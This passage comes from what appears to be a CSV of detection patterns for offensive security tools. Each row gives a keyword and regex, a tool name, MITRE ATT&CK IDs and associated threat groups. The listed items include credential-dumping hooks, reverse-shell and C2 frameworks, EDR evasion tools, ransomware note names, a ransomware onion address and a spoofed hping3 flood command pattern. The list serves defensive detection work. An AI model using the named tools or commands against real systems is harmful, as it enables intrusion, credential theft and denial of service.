Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","New-HoneyHash.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","47263" "*Hook installed in 
mstsc.exe, PID *",".{0,1000}Hook\sinstalled\sin\smstsc\.exe,\sPID\s.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","47264" "*HookChainFinder M4v3r1ck by Sec4US Team*",".{0,1000}HookChainFinder\sM4v3r1ck\sby\sSec4US\sTeam.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","47265" "*hookedbrowsers.rb*",".{0,1000}hookedbrowsers\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47266" "*hook-infection_monkey.exploit.py*",".{0,1000}hook\-infection_monkey\.exploit\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47267" "*hook-infection_monkey.network.py*",".{0,1000}hook\-infection_monkey\.network\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47268" "*hook-infection_monkey.post_breach.actions.py*",".{0,1000}hook\-infection_monkey\.post_breach\.actions\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47269" "*hook-infection_monkey.post_breach.py*",".{0,1000}hook\-infection_monkey\.post_breach\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47270" "*hook-infection_monkey.ransomware.py*",".{0,1000}hook\-infection_monkey\.ransomware\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47271" "*hook-infection_monkey.system_info.collectors.py*",".{0,1000}hook\-infection_monkey\.system_info\.collectors\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47272" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army 
knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","47273" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","47274" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation 
tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","47275" "*hook-lsassy.py*",".{0,1000}hook\-lsassy\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","47276" "*hook-pypsrp.py*",".{0,1000}hook\-pypsrp\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47277" "*hook-pypykatz.py*",".{0,1000}hook\-pypykatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","47278" "*hopefully it's a DA password*",".{0,1000}hopefully\sit\'s\sa\sDA\spassword.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","47279" "*Hossam Ehab / An EDR (End Point Detection & Response) Evasion 
Tool*",".{0,1000}Hossam\sEhab\s\/\sAn\sEDR\s\(End\sPoint\sDetection\s\&\sResponse\)\sEvasion\sTool.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","47280" "*'Host the Phising App'*",".{0,1000}\'Host\sthe\sPhising\sApp\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","47282" "*HOST/EXEGOL-01.*",".{0,1000}HOST\/EXEGOL\-01\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47283" "*Host: FUZZ.machine.org*",".{0,1000}Host\:\sFUZZ\.machine\.org.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","47284" "*HostEnum.ps1*",".{0,1000}HostEnum\.ps1.{0,1000}","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. 
If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","N/A","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","47285" "*HostExploiter.py*",".{0,1000}HostExploiter\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","47286" "*HostingCLR_inject*",".{0,1000}HostingCLR_inject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47287" "*HostingCLRx64.dll*",".{0,1000}HostingCLRx64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47288" "*hotnops.gitbook.io/gtunnel*",".{0,1000}hotnops\.gitbook\.io\/gtunnel.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","47290" "*hotnops/gTunnel*",".{0,1000}hotnops\/gTunnel.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","47291" "*houqingv1.0.zip*",".{0,1000}houqingv1\.0\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","47292" "*HOW_TO_DECRYPT.txt*",".{0,1000}HOW_TO_DECRYPT\.txt.{0,1000}","offensive_tool_keyword","Hive","Hive ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","47293" "*HOW_TO_DECYPHER_FILES.txt*",".{0,1000}HOW_TO_DECYPHER_FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","47294" "*However, when tun2socks is in the*",".{0,1000}However,\swhen\stun2socks\sis\sin\sthe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","47295" "*How-to-bypass-UAC-in-newer-Windows-versions.html*",".{0,1000}How\-to\-bypass\-UAC\-in\-newer\-Windows\-versions\.html.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","47296" "*Hp6kvaq9BCyI*",".{0,1000}Hp6kvaq9BCyI.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","user agent NIKMOK observed in AsyncRAT sample","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","Asyncrat - Redline","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","Malware","https://x.com/g0njxa/status/1829177645348860120","1","0","#mutex","https://www.virustotal.com/gui/file/810791ccd63225a766dd580e0e83d502df14172812fb912997e6a844bc9d7f6c/","9","10","N/A","N/A","N/A","N/A","47297" "*hpe_sim_76_amf_deserialization*",".{0,1000}hpe_sim_76_amf_deserialization.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47298" "*hpglfhgfnhbgpjdenjgmdgoeiappafln*",".{0,1000}hpglfhgfnhbgpjdenjgmdgoeiappafln.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","47299" "*hping2.h*",".{0,1000}hping2\.h.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. 
hping3 can handle fragmentation","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","47300" "*hping3 -*",".{0,1000}hping3\s\-.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","47301" "*hping3 * --flood --frag --spoof * --destport*",".{0,1000}hping3\s.{0,1000}\s\-\-flood\s\-\-frag\s\-\-spoof\s.{0,1000}\s\-\-destport.{0,1000}","offensive_tool_keyword","hping3","HPING3 DoS","T1498 - T1095 - T1045","TA0040 - TA0001 - TA0043","N/A","N/A","Impact","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","#linux","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","47302" "*hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad.onion*",".{0,1000}hpoo4dosa3x4ognfxpqcrjwnsigvslm7kv6hvmhh2yqczaxy3j6qnwad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47303" "*href=""""/"""">tor2web*",".{0,1000}href\=\""\/\""\>tor2web\<\/a\>.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","47304" "*HRShell*client.py*",".{0,1000}HRShell.{0,1000}client\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an 
HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","47305" "*HRShell*server.py*",".{0,1000}HRShell.{0,1000}server\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","47306" "*hta_evasion.hta*",".{0,1000}hta_evasion\.hta.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","47307" "*HtaPowershellGenerator.*",".{0,1000}HtaPowershellGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","47308" "*hta-to-javascript-crypter*",".{0,1000}hta\-to\-javascript\-crypter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","47309" "*HtaVBSGenerator.*",".{0,1000}HtaVBSGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","47310" 
"*htdigest2john.py*",".{0,1000}htdigest2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","47311" "*htdocs/database/jasmin_db.sql*",".{0,1000}htdocs\/database\/jasmin_db\.sql.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","47312" "*html/js/beacons.js*",".{0,1000}html\/js\/beacons\.js.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is a 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - 
Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","47313" "*html/scripts/merlin.js*",".{0,1000}html\/scripts\/merlin\.js.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","47314" "*Html-Injection-Payloads.*",".{0,1000}Html\-Injection\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation 